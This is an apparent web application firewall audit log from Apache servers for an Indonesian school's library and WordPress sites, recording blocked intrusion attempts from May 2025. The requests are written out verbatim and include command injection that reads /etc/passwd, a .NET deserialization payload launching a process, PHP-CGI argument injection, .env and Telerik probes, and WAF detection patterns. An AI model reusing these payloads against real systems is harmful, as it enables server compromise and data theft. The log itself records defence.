"COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747793671809858 4794 (- - -) Stopwatch2: 1747793671809858 4794; combined=3424, p1=371, p2=2960, p3=23, p4=40, p5=30, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6f8f528-Z-- --d6ec8d33-A-- [21/May/2025:09:14:31 +0700] aC03B4v3pT1iV0OxjLTnLwAAAI4 103.236.140.4 40514 103.236.140.4 8181 --d6ec8d33-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788136 --d6ec8d33-C-- whatever-content --d6ec8d33-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6ec8d33-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747793671815076 4848 (- - -) Stopwatch2: 1747793671815076 4848; combined=3743, p1=352, p2=3318, p3=21, p4=23, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6ec8d33-Z-- --f12c7a61-A-- [21/May/2025:09:14:31 +0700] aC03B4v3pT1iV0OxjLTnMAAAAJE 103.236.140.4 40520 103.236.140.4 8181 --f12c7a61-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 167545241 --f12c7a61-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --f12c7a61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f12c7a61-E-- --f12c7a61-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793671825407 1693 (- - -) Stopwatch2: 1747793671825407 1693; combined=527, p1=344, p2=155, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f12c7a61-Z-- --7e617266-A-- [21/May/2025:09:14:31 +0700] aC03B3ZGSt58M5vv3glyhAAAABc 103.236.140.4 40522 103.236.140.4 8181 --7e617266-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788139 --7e617266-C-- 
stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%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%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%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%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --7e617266-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e617266-E-- --7e617266-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793671825795 13885 (- - -) Stopwatch2: 1747793671825795 13885; combined=12463, p1=364, p2=12071, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e617266-Z-- --dba77f40-A-- [21/May/2025:09:14:32 +0700] aC03CIv3pT1iV0OxjLTnMwAAAI8 103.236.140.4 40546 103.236.140.4 8181 --dba77f40-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 167545247 --dba77f40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dba77f40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793672139730 1924 (- - -) Stopwatch2: 1747793672139730 1924; combined=847, p1=326, p2=492, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dba77f40-Z-- --a6aa4268-A-- [21/May/2025:09:14:33 +0700] aC03CYv3pT1iV0OxjLTnNgAAAIM 103.236.140.4 40556 103.236.140.4 8181 --a6aa4268-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788153 --a6aa4268-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6aa4268-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793673110005 2658 (- - -) Stopwatch2: 1747793673110005 2658; combined=1409, p1=404, p2=979, p3=0, p4=0, p5=26, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6aa4268-Z-- --cfa4047b-A-- [21/May/2025:09:31:15 +0700] aC068xpv_mIXt2pDBOoHAAAAAME 103.236.140.4 40702 103.236.140.4 8181 --cfa4047b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.131.13.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.131.13.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cfa4047b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfa4047b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747794675937099 3173 (- - -) Stopwatch2: 1747794675937099 3173; combined=1334, p1=464, p2=834, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfa4047b-Z-- --787dd925-A-- [21/May/2025:09:32:41 +0700] aC07SYv3pT1iV0OxjLTnXAAAAJA 103.236.140.4 40706 103.236.140.4 8181 --787dd925-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 75.119.193.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 75.119.193.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --787dd925-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --787dd925-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747794761421523 2987 (- - -) Stopwatch2: 1747794761421523 2987; combined=1325, p1=451, p2=843, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --787dd925-Z-- --a6b2db14-A-- [21/May/2025:09:46:08 +0700] aC0-cIv3pT1iV0OxjLTnZQAAAIQ 103.236.140.4 40754 103.236.140.4 8181 --a6b2db14-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a6b2db14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6b2db14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747795568460783 865 (- - -) Stopwatch2: 1747795568460783 865; combined=326, p1=292, p2=0, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6b2db14-Z-- --0acf8f72-A-- [21/May/2025:09:46:08 +0700] aC0-cIv3pT1iV0OxjLTnZgAAAIg 103.236.140.4 40758 103.236.140.4 8181 --0acf8f72-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0acf8f72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0acf8f72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747795568556287 643 (- - -) Stopwatch2: 1747795568556287 643; combined=242, p1=214, p2=0, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0acf8f72-Z-- --e7dd866a-A-- [21/May/2025:09:46:08 +0700] aC0-cIv3pT1iV0OxjLTnaAAAAIk 103.236.140.4 40762 103.236.140.4 8181 --e7dd866a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e7dd866a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7dd866a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747795568851141 698 (- - -) Stopwatch2: 1747795568851141 698; combined=279, p1=251, p2=0, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7dd866a-Z-- --45546657-A-- [21/May/2025:09:51:13 +0700] aC0_oYv3pT1iV0OxjLTnbAAAAJA 103.236.140.4 40778 103.236.140.4 8181 --45546657-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: uid=1234123 X-Varnish: 164788219 --45546657-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --45546657-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45546657-E-- --45546657-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747795873136028 1797 (- - -) Stopwatch2: 1747795873136028 1797; combined=588, p1=380, p2=180, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45546657-Z-- --d3fe0e1f-A-- [21/May/2025:09:54:28 +0700] aC1AZCioYDAgD0WHUjSnSwAAAEs 103.236.140.4 40802 103.236.140.4 8181 --d3fe0e1f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 150.242.85.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 150.242.85.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d3fe0e1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3fe0e1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747796068370242 3242 (- - -) Stopwatch2: 1747796068370242 3242; combined=1299, p1=444, p2=825, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3fe0e1f-Z-- --5ea8e028-A-- [21/May/2025:10:21:58 +0700] aC1G1ov3pT1iV0OxjLTnjwAAAJI 103.236.140.4 41010 103.236.140.4 8181 --5ea8e028-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --5ea8e028-C-- --5ea8e028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ea8e028-E-- --5ea8e028-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747797718125192 4045 (- - -) Stopwatch2: 1747797718125192 4045; combined=2149, 